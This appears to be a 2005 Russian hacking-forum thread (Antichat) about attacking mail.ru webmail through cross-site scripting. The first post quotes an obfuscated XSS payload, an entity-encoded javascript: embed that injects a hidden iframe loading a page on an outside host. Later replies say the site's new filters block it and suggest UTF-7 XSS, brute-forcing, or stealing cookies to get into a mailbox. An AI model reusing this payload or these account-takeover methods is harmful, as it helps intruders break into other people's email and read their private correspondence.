HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу проблема с mail.ru
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

проблема с mail.ru
  #1  
Старый 19.06.2005, 17:46
unhappy
Новичок
Регистрация: 24.02.2004
Сообщений: 9
С нами: 11688291

Репутация: 0
Question проблема с mail.ru
сделал все как написано в вашей статье, себе на сайт залил файл с формой, а на нужный мыльник отправил
Код HTML:
<embed src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58status=location;document.getElementById('xxx').innerHTML='<&#105&#102&#114&#97&#109&#101 src=http://yoursite.ru/yourscript.html width=0 height=0></&#105&#102&#114&#97&#109&#101>';this.wav" width=0 height=0> <p id='xxx'>
мыльник который хочу сломать - мой =) т.е. я знаю от него пароль, просто на своём эксперементирую =) когда я открыл тот ящик куда пришел выше указанный код, я заметил, что, по идее хтмл кода-то не должно быть видно, а он походу отфильтровывается теперь...т.е. код отосланный мной, его видно в письме, и он, естессно, не пашет...
зы: вначале письмо в хтмл формате (не аттачем)...
вот...че такое?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 19.06.2005, 17:54
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
С нами: 11338946

Репутация: 300


По умолчанию
там поставили новые фильтры
теперь c наличием xss - там проблема
 
Ответить с цитированием

  #3  
Старый 19.06.2005, 18:18
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
С нами: 11150246

Репутация: 412


По умолчанию
Мдя...Mail.ru обновился....
 
Ответить с цитированием

  #4  
Старый 19.06.2005, 18:32
unhappy
Новичок
Регистрация: 24.02.2004
Сообщений: 9
С нами: 11688291

Репутация: 0
По умолчанию
*** и чего...теперь там дыр нету? как еще можно ломануть? =)
зы: социнженерью не предлагать...

from moderator : не матерись
Последний раз редактировалось Майор; 19.06.2005 в 19:21..
 
Ответить с цитированием

  #5  
Старый 19.06.2005, 19:11
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
С нами: 11338946

Репутация: 300


По умолчанию
Почитайте "Использование UTF-7 в атаках класса XSS"
Последний раз редактировалось Майор; 19.06.2005 в 19:13..
 
Ответить с цитированием

  #6  
Старый 19.06.2005, 19:12
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию
раз не СИ, так брут -)
 
Ответить с цитированием

  #7  
Старый 19.06.2005, 19:19
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
С нами: 11627066

Репутация: 42
По умолчанию
найти XSS еще не значит ломануть. С её помощью там ничего не сделаешь, только настроишь пересылку, что весьма затруднительно реализовать. Ну или просто зайдешь в ящик, похитив куки.
А пример рабочей XSS вот здесь можно найти
http://forum.antichat.ru/showthread....st46400&conly=
 
Ответить с цитированием

  #8  
Старый 19.06.2005, 19:31
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
С нами: 11338946

Репутация: 300


По умолчанию
Цитата:
Сообщение от JazzzSummerMan  
найти XSS еще не значит ломануть. С её помощью там ничего не сделаешь, только настроишь пересылку, что весьма затруднительно реализовать. Ну или просто зайдешь в ящик, похитив куки.
А пример рабочей XSS вот здесь можно найти
http://forum.antichat.ru/showthread....st46400&conly=
уже не пашет
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.